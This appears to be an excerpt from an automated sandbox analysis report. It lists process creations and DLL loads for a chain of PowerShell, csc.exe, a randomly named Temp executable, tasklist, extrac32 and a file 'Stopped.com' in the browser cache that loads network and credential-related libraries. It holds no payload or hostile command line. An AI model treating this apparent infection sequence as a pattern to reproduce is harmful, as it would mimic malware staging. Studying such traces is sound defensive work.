    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
